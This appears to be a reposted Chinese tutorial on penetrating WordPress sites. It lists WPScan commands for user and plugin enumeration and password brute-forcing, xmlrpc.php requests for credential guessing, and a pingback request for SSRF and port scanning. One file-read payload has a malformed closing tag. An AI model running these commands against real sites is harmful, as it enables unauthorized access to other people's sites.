Wordpress漏洞利用&WPscan使用

Posted Ocean:)

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Wordpress漏洞利用&WPscan使用相关的知识,希望对你有一定的参考价值。

WordPress是一个开源的内容管理系统(CMS),在全球范围内使用比较广泛,当遇到一个WP站点时可以首先用WPscan进行扫描收集信息

WPscan

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞,在遇到wp站点时可以扫描一下

1、刺探基础信息:
wpscan --url http://www.example.com

2、猜解后台用户名
wpscan --url http://www.example.com --enumerate u

3、使用字典暴破用户名admin的密码
wpscan --url http://www.example.com -P password.txt -U admin 

4、扫描插件
wpscan --url http://www.example.com --enumerate p

5、扫描易受攻击的插件
wpscan --url http://www.example.com --enumerate vp

6、扫描所有插件
wpscan --url http://www.example.com --enumerate ap

渗透wordpress的思路:

(1)暴力破解其账户密码
    尝试top10的账号,弱口令密码
    用wpscan对用户名以及密码进行枚举等
(2)插件漏洞的破解

对其进行插件扫描:

wpscan --url http://192.168.1.72 --enumerate ap --plugins-detection aggressive

建议扫描的时候使用aggressive模式,不然有些插件扫描不出来

wordpress的主要还是从插件下手,对于识别出的插件可以在网站搜索漏洞

https://wpscan.com/search

之后做个脚本小子就行了,复现漏洞

xmlrpc.php

如果网站存在xmlrpc.php,有以下几种利用方式

查看系统允许的方法

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 135

<?xml version="1.0" encoding="utf-8"?> 
<methodCall> 
<methodName>system.listMethods</methodName> 
<params></params> 
</methodCall>

暴力破解用户名

POST /xmlrpc.php HTTP/1.1
Host: example.com
Content-Length: 235

<?xml version="1.0" encoding="UTF-8"?>
<methodCall> 
<methodName>wp.getUsersBlogs</methodName> 
<params> 
<param><value>\\\\your username\\\\</value></param> 
<param><value>\\\\your password\\\\</value></param> 
</params> 
</methodCall>

用wpscan爆破密码也是利用的xmlrpc.php

wpscan --url http://www.example.com -P password.txt -U admin 

破解成功后可以去后台登录,登陆地址是:网站域名/wp-admin/

SSRF

WordPress 版本< 3.5.1
通过Pingback可以实现的服务器端请求伪造 (Server-side request forgery,SSRF)和远程端口扫描

POST /wordpress/xmlrpc.php HTTP/1.1
Host: www.example.com
Content-Length: 99

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>要探测的ip和端口:http://127.0.0.1:80</string></value>
</param><param><value><string>网站上一篇博客的URL:http://localhost/wordpress/?p=1)<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

脚本

https://github.com/FireFart/WordpressPingbackPortScanner

读取文件

不一定成功

<?xml version="1.0" encoding="utf-8"?>
<methodCall>
<methodName>pingback.ping
</methodNmae>
<params>
<param>
<value>
<string>
file://C:\\wamp64\\www\\htdocs\\sfc\\wp-includes\\rss-functions.php
</string>
</value>
</param>
</params>
</methodCall>

以上是关于Wordpress漏洞利用&WPscan使用的主要内容,如果未能解决你的问题,请参考以下文章

WPScan扫描Wordpress漏洞

WPScan基本使用

raven靶机

raven靶机

wpscan操作

WPSeku - Wordpress 漏洞扫描工具